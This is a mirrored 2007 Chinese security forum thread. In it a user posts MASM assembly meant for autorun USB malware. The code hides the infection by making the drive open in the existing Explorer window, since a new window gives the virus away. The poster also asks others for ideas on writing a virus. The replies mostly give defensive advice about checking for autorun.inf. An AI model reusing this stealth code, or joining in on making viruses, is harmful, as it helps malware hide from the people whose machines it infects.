返回信息流当双击打开U盘的时候..一看到是开的新窗口,直接反映就是中了毒了,你说你一个病毒都做出来,为什么就不弄的好一点呢...借机发个代码,哈
Autorun中在同窗口中打开U盘,以后更要小心啦
.386
.model flat,stdcall
option casemap :none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
.data
.code
EnumProc proc hWnd:DWORD,lParam:DWORD
push eax
mov eax,esp
invoke GetClassName,hWnd,eax,4
pop eax
cmp eax,'idE'
jnz @f
invoke SendMessage,hWnd,WM_SETTEXT, NULL,addr lParam
invoke PostMessage,hWnd,WM_KEYDOWN, VK_RETURN,1
invoke PostMessage,hWnd,WM_KEYUP, VK_RETURN,1
invoke PostMessage,hWnd,WM_KILLFOCUS,NULL,NULL
@@:
mov eax,TRUE
ret
EnumProc endp
start:
invoke GetCommandLine
inc eax
mov ebx,'\:C'
mov bl,byte ptr[eax]
invoke GetForegroundWindow
invoke EnumChildWindows,eax,offset EnumProc,ebx
xor eax,eax
ret
end start
另:最近病毒疯狂,M$还出各种漏洞,想写个毒玩玩,各位有什么歪点子么?
这是一条镜像帖。来源:北邮人论坛 / security / #9795同步于 2007/4/22
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
那些垃圾autorun病毒,就不知道好好完善一下自己....[原创]
ComicLiu
2007/4/22镜像同步17 回复
订阅后,新回复会通过你的通知中心匿名送达。
9 条回复
对于大部分人来说,根本不会在意是同窗口还是新窗口
U盘插进去window有时候还自动跳出一个新窗口打开呢(选择了自动播放方式的话)
对于另外那部分人来说,就是做成了同窗口打开,也照样知道中毒了
【 在 ComicLiu 的大作中提到: 】
: hoho做成同窗口打开,就不一定知道中毒哦~~毒已经进内存,可以掩蔽的方式就更多啦~
就是再同窗口不照样要靠Autorun.inf
U盘不双击,查看里面有没有autorun.inf
U盘里面有没有毒,结果就很明显了
【 在 bc 的大作中提到: 】
: 就是再同窗口不照样要靠Autorun.inf
: U盘不双击,查看里面有没有autorun.inf
: U盘里面有没有毒,结果就很明显了
是这样子滴
不管病毒是什么样子滴
明白人一样不会中,除非一时大意
不明白的人再低的病毒也会中
【 在 shinefs 的大作中提到: 】
: 是这样子滴
: 不管病毒是什么样子滴
: 明白人一样不会中,除非一时大意
: ...................
和NB人玩,其乐无穷~~灭哈哈哈